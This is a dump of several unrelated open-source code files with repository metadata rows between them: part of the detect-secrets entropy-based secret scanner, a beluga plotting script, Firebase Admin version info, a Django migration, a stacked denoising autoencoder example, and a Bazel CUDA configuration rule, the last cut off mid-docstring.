(self._analyze_ini_file(add_header=True), configparser.Error),
)
for analyze_function, exception_class in file_type_analyzers:
try:
output = analyze_function(file, filename)
if output:
return output
except exception_class:
pass
file.seek(0)
return {}
def calculate_shannon_entropy(self, data):
"""Returns the entropy of a given string.
Borrowed from: http://blog.dkbza.org/2007/05/scanning-data-for-entropy-anomalies.html.
:param data: string. The word to analyze.
:returns: float, between 0.0 and 8.0
"""
if not data: # pragma: no cover
return 0
entropy = 0
for x in self.charset:
p_x = float(data.count(x)) / len(data)
if p_x > 0:
entropy += - p_x * math.log(p_x, 2)
return entropy
@staticmethod
def _filter_false_positives_with_line_ctx(potential_secrets, line):
return {
key: value for key, value in potential_secrets.items()
if not is_false_positive_with_line_context(
key.secret_value,
line,
)
}
def analyze_line(self, string, line_num, filename):
output = super(HighEntropyStringsPlugin, self).analyze_line(
string,
line_num,
filename,
)
return self._filter_false_positives_with_line_ctx(
output,
string,
)
def analyze_string_content(self, string, line_num, filename):
"""Searches string for custom pattern, and captures all high entropy strings that
match self.regex, with a limit defined as self.entropy_limit.
"""
output = {}
for result in self.secret_generator(string):
if self.is_secret_false_positive(result):
continue
secret = PotentialSecret(self.secret_type, filename, result, line_num)
output[secret] = secret
return output
def secret_generator(self, string, *args, **kwargs):
# There may be multiple strings on the same line
results = self.regex.findall(string)
for result in results:
# To accommodate changing self.regex, due to different filetypes
if isinstance(result, tuple):
result = result[1]
entropy_value = self.calculate_shannon_entropy(result)
if entropy_value > self.entropy_limit:
yield result
def adhoc_scan(self, string):
# Since it's an individual string, it's just bad UX to require quotes
# around the expected secret.
with self.non_quoted_string_regex(is_exact_match=False):
results = self.analyze_line(
string,
line_num=0,
filename='does_not_matter',
)
# Note: Trailing space allows for nicer formatting
output = 'False' if not results else 'True '
if results:
# We currently assume that there's at most one secret per line.
output += ' ({})'.format(
round(
self.calculate_shannon_entropy(
list(results.keys())[0].secret_value,
),
3,
),
)
elif ' ' not in string:
# In the case where the string is a single word, and it
# matches the regex, we can show the entropy calculation,
# to assist investigation when it's unclear *why* something
# is not flagged.
#
# Conversely, if there are multiple words in the string,
# the entropy value would be confusing, since it's not clear
# which word the entropy is calculated for.
matches = self.regex.search(string)
if matches and matches.group(1) == string:
output += ' ({})'.format(
round(self.calculate_shannon_entropy(string), 3),
)
return output
@contextmanager
def non_quoted_string_regex(self, is_exact_match=True):
"""For certain file formats, strings need not necessarily follow the
normal convention of being denoted by single or double quotes. In these
cases, we modify the regex accordingly.
Public, because detect_secrets.core.audit needs to reference it.
:param is_exact_match: True if you need to scan the string itself.
However, if the string is a line of text, and you want to see
whether a secret exists in this line, use False.
"""
old_regex = self.regex
regex_alternative = r'([{}]+)'.format(re.escape(self.charset))
if is_exact_match:
regex_alternative = r'^' + regex_alternative + r'$'
self.regex = re.compile(regex_alternative)
try:
yield
finally:
self.regex = old_regex
def _analyze_ini_file(self, add_header=False):
"""
:returns: same format as super().analyze()
"""
def wrapped(file, filename):
output = {}
with self.non_quoted_string_regex():
for key, value, lineno in IniFileParser(
file,
add_header,
exclude_lines_regex=self.exclude_lines_regex,
).iterator():
potential_secrets = self.analyze_string_content(
value,
lineno,
filename,
)
line = u'{key}={value}'.format(key=key, value=value)
potential_secrets = self._filter_false_positives_with_line_ctx(
potential_secrets,
line,
)
output.update(potential_secrets)
return output
return wrapped
def _analyze_yaml_file(self, file, filename):
"""
:returns: same format as super().analyze()
"""
if determine_file_type(filename) != FileType.YAML:
# The yaml parser is pretty powerful. It eagerly
# parses things when it's not even a yaml file. Therefore,
# we use this heuristic to quit early if appropriate.
raise yaml.YAMLError
parser = YamlFileParser(
file,
exclude_lines_regex=self.exclude_lines_regex,
)
data = parser.json()
# If the file is all comments
if not data:
raise yaml.YAMLError
ignored_lines = parser.get_ignored_lines()
potential_secrets = {}
to_search = [data]
with self.non_quoted_string_regex():
while len(to_search) > 0:
item = to_search.pop()
if '__line__' not in item:
for key in item:
obj = item[key] if isinstance(item, dict) else key
if isinstance(obj, dict):
to_search.append(obj)
continue
if item['__line__'] in ignored_lines:
continue
# An isinstance check doesn't work in py2
# so we need the __is_binary__ field.
string_to_scan = (
self.decode_binary(item['__value__'])
if item['__is_binary__']
else item['__value__']
)
secrets = self.analyze_string_content(
string_to_scan,
item['__line__'],
filename,
)
if item['__is_binary__']:
secrets = self._encode_yaml_binary_secrets(secrets)
dumped_key_value = yaml.dump({
item['__original_key__']: item['__value__'],
}).replace('\n', '')
secrets = self._filter_false_positives_with_line_ctx(
secrets,
dumped_key_value,
)
potential_secrets.update(secrets)
return potential_secrets
def _encode_yaml_binary_secrets(self, secrets):
new_secrets = {}
"""The secrets dict format is
`{PotentialSecret: PotentialSecret}`, where both key and
value are the same object. Therefore, we can just mutate
the potential secret once.
"""
for potential_secret in secrets.keys():
secret_in_yaml_format = yaml.dump(
self.encode_to_binary(potential_secret.secret_value),
).replace(
'!!binary |\n ',
'',
).rstrip()
potential_secret.set_secret(secret_in_yaml_format)
new_secrets[potential_secret] = potential_secret
return new_secrets
@abstractmethod
def decode_binary(self, bytes_object): # pragma: no cover
"""Converts the bytes to a string which can be checked for
high entropy."""
pass
@abstractmethod
def encode_to_binary(self, string): # pragma: no cover
"""Converts a string (usually a high-entropy secret) to
binary. Usually the inverse of decode_binary."""
pass
class HexHighEntropyString(HighEntropyStringsPlugin):
"""Scans for random-looking hex encoded strings."""
secret_type = 'Hex High Entropy String'
def __init__(self, hex_limit, exclude_lines_regex=None, automaton=None, **kwargs):
super(HexHighEntropyString, self).__init__(
charset=string.hexdigits,
limit=hex_limit,
exclude_lines_regex=exclude_lines_regex,
automaton=automaton,
)
@classproperty
def disable_flag_text(cls):
return 'no-hex-string-scan'
@classproperty
def default_options(cls):
return {
'hex_limit': 3,
}
@property
def __dict__(self):
output = super(HighEntropyStringsPlugin, self).__dict__
output.update({
'hex_limit': self.entropy_limit,
})
return output
def calculate_shannon_entropy(self, data):
"""
In our investigations, we have found that when the input is all digits,
the number of false positives we get greatly exceeds realistic true
positive scenarios.
Therefore, this tries to capture this heuristic mathemetically.
We do this by noting that the maximum shannon entropy for this charset
is ~3.32 (e.g. "0123456789", with every digit different), and we want
to lower that below the standard limit, 3. However, at the same time,
we also want to accommodate the fact that longer strings have a higher
chance of being a true positive, which means "01234567890123456789"
should be closer to the maximum entropy than the shorter version.
"""
entropy = super(HexHighEntropyString, self).calculate_shannon_entropy(data)
if len(data) == 1:
return entropy
try:
# Check if str is that of a number
int(data)
# This multiplier was determined through trial and error, with the
# intent of keeping it simple, yet achieving our goals.
entropy -= 1.2 / math.log(len(data), 2)
except ValueError:
pass
return entropy
def decode_binary(self, bytes_object):
return bytes_object.decode('utf-8')
def encode_to_binary(self, string):
return string.encode('utf-8')
class Base64HighEntropyString(HighEntropyStringsPlugin):
"""Scans for random-looking base64 encoded strings."""
secret_type = 'Base64 High Entropy String'
def __init__(self, base64_limit, exclude_lines_regex=None, automaton=None, **kwargs):
charset = (
string.ascii_letters
+ string.digits
+ '+/' # Regular base64
+ '\\-_' # Url-safe base64
+ '=' # Padding
)
super(Base64HighEntropyString, self).__init__(
charset=charset,
limit=base64_limit,
exclude_lines_regex=exclude_lines_regex,
automaton=automaton,
)
@classproperty
def disable_flag_text(cls):
return 'no-base64-string-scan'
@classproperty
def default_options(cls):
return {
'base64_limit': 4.5,
}
@property
def __dict__(self):
output = super(HighEntropyStringsPlugin, self).__dict__
output.update({
'base64_limit': self.entropy_limit,
})
return output
def decode_binary(self, bytes_object):
return base64.b64encode(bytes_object).decode('utf-8')
def encode_to_binary(self, string):
return base64.b64decode(string)
| 33.941834
| 94
| 0.588782
|
4a0f438a1cc0c8534fedc3bef50bd2c00a4a439f
| 1,809
|
py
|
Python
|
examples/qcpi/heatRate/compare_plot.py
|
Rapid-Design-of-Systems-Laboratory/beluga-legacy
|
d14713d8211b64293c4427005cf02fbd58630598
|
[
"MIT"
] | 1
|
2019-03-26T03:00:03.000Z
|
2019-03-26T03:00:03.000Z
|
examples/qcpi/heatRate/compare_plot.py
|
Rapid-Design-of-Systems-Laboratory/beluga-legacy
|
d14713d8211b64293c4427005cf02fbd58630598
|
[
"MIT"
] | null | null | null |
examples/qcpi/heatRate/compare_plot.py
|
Rapid-Design-of-Systems-Laboratory/beluga-legacy
|
d14713d8211b64293c4427005cf02fbd58630598
|
[
"MIT"
] | 1
|
2019-07-14T22:53:52.000Z
|
2019-07-14T22:53:52.000Z
|
from beluga.visualization import BelugaPlot
from beluga.visualization.datasources import Dill
# plots = BelugaPlot('./data.dill',default_sol=-1,default_step=0)
mpbvp_ds = Dill('../../mpbvp/planarHypersonicWithHeatRate/data_1200.dill')
plots = BelugaPlot('./data_1200_2deg15km_ep4.dill',default_sol=-1,default_step=-1, renderer='matplotlib')
plots.add_plot().line('theta*180/3.14','h/1000',label='ICRM Solution') \
.xlabel('Downrange (deg)').ylabel('h (km)') \
.title('Altitude vs. Downrange') \
.line('theta*180/3.14','h/1000',label='MPBVP Solution', datasource=mpbvp_ds, step=-1, sol=-1) \
plots.add_plot().line('t','k*sqrt(rho0*exp(-h/H)/rn)*v**3/10000',label='ICRM Solution') \
.line('t','k*sqrt(rho0*exp(-h/H)/rn)*v**3/10000',label='MPBVP Solution', datasource=mpbvp_ds, step=-1, sol=-1) \
.xlabel('t (s)').ylabel('Heat-rate') \
.title('Heat-rate vs. Time')
# plots.add_plot().line('t','theta*180/3.14',label='ICRM Solution') \
# .line('t','theta*180/3.14',label='MPBVP Solution', datasource=mpbvp_ds, step=-1, sol=-1)\
# .line('t','theta*180/3.14',label='Unconstrained Solution', datasource=mpbvp_ds, step=0, sol=-1)\
# .xlabel('t (s)').ylabel('theta (degrees)') \
# .title('Control history')
#
# plots.add_plot().line('t','lamY', label='ICRM Solution') \
# .line('t','lamY', label='MPBVP Solution', datasource=mpbvp_ds, step=-1, sol=-1)\
# .line('t','lamY', label='Unconstrained Solution', datasource=mpbvp_ds, step=0, sol=-1) \
# .xlabel('t (s)').ylabel('lamY') \
# .title('lamY')
plots.render()
| 58.354839
| 128
| 0.566611
|
4a0f44623979aa4cda917fef5a11a2ca457bad0c
| 809
|
py
|
Python
|
firebase_admin/__about__.py
|
kushal12345/firebase-admin-python
|
14e5dc4721f9908e132f137c87bf0dc6b8709f63
|
[
"Apache-2.0"
] | 4
|
2019-02-17T17:52:55.000Z
|
2020-05-06T06:45:56.000Z
|
firebase_admin/__about__.py
|
kushal12345/firebase-admin-python
|
14e5dc4721f9908e132f137c87bf0dc6b8709f63
|
[
"Apache-2.0"
] | null | null | null |
firebase_admin/__about__.py
|
kushal12345/firebase-admin-python
|
14e5dc4721f9908e132f137c87bf0dc6b8709f63
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""About information (version, etc) for Firebase Admin SDK."""
__version__ = '2.11.0'
__title__ = 'firebase_admin'
__author__ = 'Firebase'
__license__ = 'Apache License 2.0'
__url__ = 'https://firebase.google.com/docs/admin/setup/'
| 36.772727
| 74
| 0.751545
|
4a0f44a288ce93138794c349bb1c8681911e53d9
| 326
|
py
|
Python
|
apps/accounts/migrations/0005_merge.py
|
dtisza1/bluebutton-web-server
|
6322f28d75bd9e00f8dc4b5988a0cd5f7c6c80cb
|
[
"Apache-2.0"
] | 25
|
2017-12-10T00:48:31.000Z
|
2022-03-25T01:29:13.000Z
|
apps/accounts/migrations/0005_merge.py
|
dtisza1/bluebutton-web-server
|
6322f28d75bd9e00f8dc4b5988a0cd5f7c6c80cb
|
[
"Apache-2.0"
] | 298
|
2017-12-05T05:53:32.000Z
|
2022-03-21T19:29:03.000Z
|
apps/accounts/migrations/0005_merge.py
|
dtisza1/bluebutton-web-server
|
6322f28d75bd9e00f8dc4b5988a0cd5f7c6c80cb
|
[
"Apache-2.0"
] | 31
|
2017-12-04T16:01:12.000Z
|
2021-09-26T22:34:55.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-26 20:31
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('accounts', '0004_merge'),
('accounts', '0004_auto_20160720_1816'),
]
operations = [
]
| 19.176471
| 48
| 0.650307
|
4a0f45a3cb2b9692ae1b99252dc8591edc461d17
| 5,877
|
py
|
Python
|
SdA.py
|
yanshengli/DBN_Learning
|
a9d2dc337b079cccdc172d1957a14a20c146b9b3
|
[
"Apache-2.0"
] | 15
|
2015-07-30T12:45:38.000Z
|
2022-03-24T06:01:29.000Z
|
example/DeepLearning/python/SdA.py
|
yulongfan/tryEverything
|
2f66a8d33c3539e46d91527186bc52515ce5b14f
|
[
"Apache-2.0"
] | null | null | null |
example/DeepLearning/python/SdA.py
|
yulongfan/tryEverything
|
2f66a8d33c3539e46d91527186bc52515ce5b14f
|
[
"Apache-2.0"
] | 11
|
2016-08-01T02:30:33.000Z
|
2020-11-24T08:43:40.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Stacked Denoising Autoencoders (SdA)
References :
- P. Vincent, H. Larochelle, Y. Bengio, P.A. Manzagol: Extracting and
Composing Robust Features with Denoising Autoencoders, ICML' 08, 1096-1103,
2008
- DeepLearningTutorials
https://github.com/lisa-lab/DeepLearningTutorials
"""
import sys
import numpy
from HiddenLayer import HiddenLayer
from LogisticRegression import LogisticRegression
from dA import dA
from utils import *
class SdA(object):
def __init__(self, input=None, label=None,\
n_ins=2, hidden_layer_sizes=[3, 3], n_outs=2,\
numpy_rng=None):
self.x = input
self.y = label
self.sigmoid_layers = []
self.dA_layers = []
self.n_layers = len(hidden_layer_sizes) # = len(self.rbm_layers)
if numpy_rng is None:
numpy_rng = numpy.random.RandomState(1234)
assert self.n_layers > 0
# construct multi-layer
for i in xrange(self.n_layers):
# layer_size
if i == 0:
input_size = n_ins
else:
input_size = hidden_layer_sizes[i - 1]
# layer_input
if i == 0:
layer_input = self.x
else:
layer_input = self.sigmoid_layers[-1].sample_h_given_v()
# construct sigmoid_layer
sigmoid_layer = HiddenLayer(input=layer_input,
n_in=input_size,
n_out=hidden_layer_sizes[i],
numpy_rng=numpy_rng,
activation=sigmoid)
self.sigmoid_layers.append(sigmoid_layer)
# construct dA_layers
dA_layer = dA(input=layer_input,
n_visible=input_size,
n_hidden=hidden_layer_sizes[i],
W=sigmoid_layer.W,
hbias=sigmoid_layer.b)
self.dA_layers.append(dA_layer)
# layer for output using Logistic Regression
self.log_layer = LogisticRegression(input=self.sigmoid_layers[-1].sample_h_given_v(),
label=self.y,
n_in=hidden_layer_sizes[-1],
n_out=n_outs)
# finetune cost: the negative log likelihood of the logistic regression layer
self.finetune_cost = self.log_layer.negative_log_likelihood()
def pretrain(self, lr=0.1, corruption_level=0.3, epochs=100):
for i in xrange(self.n_layers):
if i == 0:
layer_input = self.x
else:
layer_input = self.sigmoid_layers[i-1].sample_h_given_v(layer_input)
da = self.dA_layers[i]
for epoch in xrange(epochs):
da.train(lr=lr, corruption_level=corruption_level, input=layer_input)
def finetune(self, lr=0.1, epochs=100):
layer_input = self.sigmoid_layers[-1].sample_h_given_v()
# train log_layer
epoch = 0
while epoch < epochs:
self.log_layer.train(lr=lr, input=layer_input)
# self.finetune_cost = self.log_layer.negative_log_likelihood()
# print >> sys.stderr, 'Training epoch %d, cost is ' % epoch, self.finetune_cost
lr *= 0.95
epoch += 1
def predict(self, x):
layer_input = x
for i in xrange(self.n_layers):
sigmoid_layer = self.sigmoid_layers[i]
layer_input = sigmoid_layer.output(input=layer_input)
out = self.log_layer.predict(layer_input)
return out
def test_SdA(pretrain_lr=0.1, pretraining_epochs=1000, corruption_level=0.3, \
finetune_lr=0.1, finetune_epochs=200):
x = numpy.array([[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0]])
y = numpy.array([[1, 0],
[1, 0],
[1, 0],
[1, 0],
[1, 0],
[0, 1],
[0, 1],
[0, 1],
[0, 1],
[0, 1]])
rng = numpy.random.RandomState(123)
# construct SdA
sda = SdA(input=x, label=y, \
n_ins=20, hidden_layer_sizes=[15, 15], n_outs=2, numpy_rng=rng)
# pre-training
sda.pretrain(lr=pretrain_lr, corruption_level=corruption_level, epochs=pretraining_epochs)
# fine-tuning
sda.finetune(lr=finetune_lr, epochs=finetune_epochs)
# test
x = numpy.array([[1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 1, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1]])
print sda.predict(x)
if __name__ == "__main__":
test_SdA()
| 33.392045
| 94
| 0.481538
|
4a0f47108813f77dfad1a1c9f17d98169332c515
| 41,160
|
bzl
|
Python
|
third_party/gpus/cuda_configure.bzl
|
tianhm/tensorflow
|
e55574f28257bdacd744dcdba86c839e661b1b2a
|
[
"Apache-2.0"
] | 47
|
2017-03-08T20:58:54.000Z
|
2021-06-24T07:07:49.000Z
|
third_party/gpus/cuda_configure.bzl
|
genSud/tensorflow
|
ec8216568d8cd9810004067558041c11a8356685
|
[
"Apache-2.0"
] | 1
|
2019-07-11T16:29:54.000Z
|
2019-07-11T16:29:54.000Z
|
third_party/gpus/cuda_configure.bzl
|
genSud/tensorflow
|
ec8216568d8cd9810004067558041c11a8356685
|
[
"Apache-2.0"
] | 19
|
2017-04-17T01:28:40.000Z
|
2020-08-15T13:01:33.000Z
|
# -*- Python -*-
"""Repository rule for CUDA autoconfiguration.
`cuda_configure` depends on the following environment variables:
* `TF_NEED_CUDA`: Whether to enable building with CUDA.
* `GCC_HOST_COMPILER_PATH`: The GCC host compiler path
* `TF_CUDA_CLANG`: Whether to use clang as a cuda compiler.
* `CLANG_CUDA_COMPILER_PATH`: The clang compiler path that will be used for
both host and device code compilation if TF_CUDA_CLANG is 1.
* `CUDA_TOOLKIT_PATH`: The path to the CUDA toolkit. Default is
`/usr/local/cuda`.
* `TF_CUDA_VERSION`: The version of the CUDA toolkit. If this is blank, then
use the system default.
* `TF_CUDNN_VERSION`: The version of the cuDNN library.
* `CUDNN_INSTALL_PATH`: The path to the cuDNN library. Default is
`/usr/local/cuda`.
* `TF_CUDA_COMPUTE_CAPABILITIES`: The CUDA compute capabilities. Default is
`3.5,5.2`.
"""
_GCC_HOST_COMPILER_PATH = "GCC_HOST_COMPILER_PATH"
_CLANG_CUDA_COMPILER_PATH = "CLANG_CUDA_COMPILER_PATH"
_CUDA_TOOLKIT_PATH = "CUDA_TOOLKIT_PATH"
_TF_CUDA_VERSION = "TF_CUDA_VERSION"
_TF_CUDNN_VERSION = "TF_CUDNN_VERSION"
_CUDNN_INSTALL_PATH = "CUDNN_INSTALL_PATH"
_TF_CUDA_COMPUTE_CAPABILITIES = "TF_CUDA_COMPUTE_CAPABILITIES"
_TF_CUDA_CONFIG_REPO = "TF_CUDA_CONFIG_REPO"
_DEFAULT_CUDA_VERSION = ""
_DEFAULT_CUDNN_VERSION = ""
_DEFAULT_CUDA_TOOLKIT_PATH = "/usr/local/cuda"
_DEFAULT_CUDNN_INSTALL_PATH = "/usr/local/cuda"
_DEFAULT_CUDA_COMPUTE_CAPABILITIES = ["3.5", "5.2"]
# TODO(dzc): Once these functions have been factored out of Bazel's
# cc_configure.bzl, load them from @bazel_tools instead.
# BEGIN cc_configure common functions.
def find_cc(repository_ctx):
"""Find the C++ compiler."""
# On Windows, we use Bazel's MSVC CROSSTOOL for GPU build
# Return a dummy value for GCC detection here to avoid error
if _is_windows(repository_ctx):
return "/use/--config=win-cuda --cpu=x64_windows_msvc/instead"
if _use_cuda_clang(repository_ctx):
target_cc_name = "clang"
cc_path_envvar = _CLANG_CUDA_COMPILER_PATH
else:
target_cc_name = "gcc"
cc_path_envvar = _GCC_HOST_COMPILER_PATH
cc_name = target_cc_name
if cc_path_envvar in repository_ctx.os.environ:
cc_name_from_env = repository_ctx.os.environ[cc_path_envvar].strip()
if cc_name_from_env:
cc_name = cc_name_from_env
if cc_name.startswith("/"):
# Absolute path, maybe we should make this supported by our which function.
return cc_name
cc = repository_ctx.which(cc_name)
if cc == None:
fail(("Cannot find {}, either correct your path or set the {}" +
" environment variable").format(target_cc_name, cc_path_envvar))
return cc
_INC_DIR_MARKER_BEGIN = "#include <...>"
# OSX add " (framework directory)" at the end of line, strip it.
_OSX_FRAMEWORK_SUFFIX = " (framework directory)"
_OSX_FRAMEWORK_SUFFIX_LEN = len(_OSX_FRAMEWORK_SUFFIX)
def _cxx_inc_convert(path):
"""Convert path returned by cc -E xc++ in a complete path."""
path = path.strip()
if path.endswith(_OSX_FRAMEWORK_SUFFIX):
path = path[:-_OSX_FRAMEWORK_SUFFIX_LEN].strip()
return path
def _get_cxx_inc_directories_impl(repository_ctx, cc, lang_is_cpp):
"""Compute the list of default C or C++ include directories."""
if lang_is_cpp:
lang = "c++"
else:
lang = "c"
# TODO: We pass -no-canonical-prefixes here to match the compiler flags,
# but in cuda_clang CROSSTOOL file that is a `feature` and we should
# handle the case when it's disabled and no flag is passed
result = repository_ctx.execute([cc, "-no-canonical-prefixes",
"-E", "-x" + lang, "-", "-v"])
index1 = result.stderr.find(_INC_DIR_MARKER_BEGIN)
if index1 == -1:
return []
index1 = result.stderr.find("\n", index1)
if index1 == -1:
return []
index2 = result.stderr.rfind("\n ")
if index2 == -1 or index2 < index1:
return []
index2 = result.stderr.find("\n", index2 + 1)
if index2 == -1:
inc_dirs = result.stderr[index1 + 1:]
else:
inc_dirs = result.stderr[index1 + 1:index2].strip()
return [str(repository_ctx.path(_cxx_inc_convert(p)))
for p in inc_dirs.split("\n")]
def get_cxx_inc_directories(repository_ctx, cc):
"""Compute the list of default C and C++ include directories."""
# For some reason `clang -xc` sometimes returns include paths that are
# different from the ones from `clang -xc++`. (Symlink and a dir)
# So we run the compiler with both `-xc` and `-xc++` and merge resulting lists
includes_cpp = _get_cxx_inc_directories_impl(repository_ctx, cc, True)
includes_c = _get_cxx_inc_directories_impl(repository_ctx, cc, False)
includes_cpp_set = set(includes_cpp)
return includes_cpp + [inc for inc in includes_c
if inc not in includes_cpp_set]
def auto_configure_fail(msg):
"""Output failure message when cuda configuration fails."""
red = "\033[0;31m"
no_color = "\033[0m"
fail("\n%sCuda Configuration Error:%s %s\n" % (red, no_color, msg))
# END cc_configure common functions (see TODO above).
def _host_compiler_includes(repository_ctx, cc):
"""Generates the cxx_builtin_include_directory entries for gcc inc dirs.
Args:
repository_ctx: The repository context.
cc: The path to the gcc host compiler.
Returns:
A string containing the cxx_builtin_include_directory for each of the gcc
host compiler include directories, which can be added to the CROSSTOOL
file.
"""
inc_dirs = get_cxx_inc_directories(repository_ctx, cc)
inc_entries = []
for inc_dir in inc_dirs:
inc_entries.append(" cxx_builtin_include_directory: \"%s\"" % inc_dir)
return "\n".join(inc_entries)
def _cuda_include_path(repository_ctx, cuda_config):
"""Generates the cxx_builtin_include_directory entries for cuda inc dirs.
Args:
repository_ctx: The repository context.
cc: The path to the gcc host compiler.
Returns:
A string containing the cxx_builtin_include_directory for each of the gcc
host compiler include directories, which can be added to the CROSSTOOL
file.
"""
nvcc_path = repository_ctx.path("%s/bin/nvcc%s" %
(cuda_config.cuda_toolkit_path,
".exe" if cuda_config.cpu_value == "Windows" else ""))
result = repository_ctx.execute([nvcc_path, '-v',
'/dev/null', '-o', '/dev/null'])
target_dir = ""
for one_line in result.stderr.splitlines():
if one_line.startswith('#$ _TARGET_DIR_='):
target_dir = (cuda_config.cuda_toolkit_path + '/' +
one_line.replace('#$ _TARGET_DIR_=', '') + "/include")
inc_entries = []
if target_dir != "":
inc_entries.append(" cxx_builtin_include_directory: \"%s\"" % target_dir)
default_include = cuda_config.cuda_toolkit_path + '/include'
inc_entries.append(" cxx_builtin_include_directory: \"%s\"" %
default_include)
return "\n".join(inc_entries)
def _enable_cuda(repository_ctx):
if "TF_NEED_CUDA" in repository_ctx.os.environ:
enable_cuda = repository_ctx.os.environ["TF_NEED_CUDA"].strip()
return enable_cuda == "1"
return False
def _cuda_toolkit_path(repository_ctx):
"""Finds the cuda toolkit directory.
Args:
repository_ctx: The repository context.
Returns:
A speculative real path of the cuda toolkit install directory.
"""
cuda_toolkit_path = _DEFAULT_CUDA_TOOLKIT_PATH
if _CUDA_TOOLKIT_PATH in repository_ctx.os.environ:
cuda_toolkit_path = repository_ctx.os.environ[_CUDA_TOOLKIT_PATH].strip()
if not repository_ctx.path(cuda_toolkit_path).exists:
auto_configure_fail("Cannot find cuda toolkit path.")
return str(repository_ctx.path(cuda_toolkit_path).realpath)
def _cudnn_install_basedir(repository_ctx):
"""Finds the cudnn install directory."""
cudnn_install_path = _DEFAULT_CUDNN_INSTALL_PATH
if _CUDNN_INSTALL_PATH in repository_ctx.os.environ:
cudnn_install_path = repository_ctx.os.environ[_CUDNN_INSTALL_PATH].strip()
if not repository_ctx.path(cudnn_install_path).exists:
auto_configure_fail("Cannot find cudnn install path.")
return cudnn_install_path
def _matches_version(environ_version, detected_version):
"""Checks whether the user-specified version matches the detected version.
This function performs a weak matching so that if the user specifies only the
major or major and minor versions, the versions are still considered matching
if the version parts match. To illustrate:
environ_version detected_version result
-----------------------------------------
5.1.3 5.1.3 True
5.1 5.1.3 True
5 5.1 True
5.1.3 5.1 False
5.2.3 5.1.3 False
Args:
environ_version: The version specified by the user via environment
variables.
detected_version: The version autodetected from the CUDA installation on
the system.
Returns: True if user-specified version matches detected version and False
otherwise.
"""
environ_version_parts = environ_version.split(".")
detected_version_parts = detected_version.split(".")
if len(detected_version_parts) < len(environ_version_parts):
return False
for i, part in enumerate(detected_version_parts):
if i >= len(environ_version_parts):
break
if part != environ_version_parts[i]:
return False
return True
_NVCC_VERSION_PREFIX = "Cuda compilation tools, release "
def _cuda_version(repository_ctx, cuda_toolkit_path, cpu_value):
"""Detects the version of CUDA installed on the system.
Args:
repository_ctx: The repository context.
cuda_toolkit_path: The CUDA install directory.
Returns:
String containing the version of CUDA.
"""
# Run nvcc --version and find the line containing the CUDA version.
nvcc_path = repository_ctx.path("%s/bin/nvcc%s" %
(cuda_toolkit_path,
".exe" if cpu_value == "Windows" else ""))
if not nvcc_path.exists:
auto_configure_fail("Cannot find nvcc at %s" % str(nvcc_path))
result = repository_ctx.execute([str(nvcc_path), '--version'])
if result.stderr:
auto_configure_fail("Error running nvcc --version: %s" % result.stderr)
lines = result.stdout.splitlines()
version_line = lines[len(lines) - 1]
if version_line.find(_NVCC_VERSION_PREFIX) == -1:
auto_configure_fail(
"Could not parse CUDA version from nvcc --version. Got: %s" %
result.stdout)
# Parse the CUDA version from the line containing the CUDA version.
prefix_removed = version_line.replace(_NVCC_VERSION_PREFIX, '')
parts = prefix_removed.split(",")
if len(parts) != 2 or len(parts[0]) < 2:
auto_configure_fail(
"Could not parse CUDA version from nvcc --version. Got: %s" %
result.stdout)
full_version = parts[1].strip()
if full_version.startswith('V'):
full_version = full_version[1:]
# Check whether TF_CUDA_VERSION was set by the user and fail if it does not
# match the detected version.
environ_version = ""
if _TF_CUDA_VERSION in repository_ctx.os.environ:
environ_version = repository_ctx.os.environ[_TF_CUDA_VERSION].strip()
if environ_version and not _matches_version(environ_version, full_version):
auto_configure_fail(
("CUDA version detected from nvcc (%s) does not match " +
"TF_CUDA_VERSION (%s)") % (full_version, environ_version))
# We only use the version consisting of the major and minor version numbers.
version_parts = full_version.split('.')
if len(version_parts) < 2:
auto_configure_fail("CUDA version detected from nvcc (%s) is incomplete.")
if cpu_value == "Windows":
version = "64_%s%s" % (version_parts[0], version_parts[1])
else:
version = "%s.%s" % (version_parts[0], version_parts[1])
return version
_DEFINE_CUDNN_MAJOR = "#define CUDNN_MAJOR"
_DEFINE_CUDNN_MINOR = "#define CUDNN_MINOR"
_DEFINE_CUDNN_PATCHLEVEL = "#define CUDNN_PATCHLEVEL"
def _find_cuda_define(repository_ctx, cudnn_header_dir, define):
"""Returns the value of a #define in cudnn.h
Greps through cudnn.h and returns the value of the specified #define. If the
#define is not found, then raise an error.
Args:
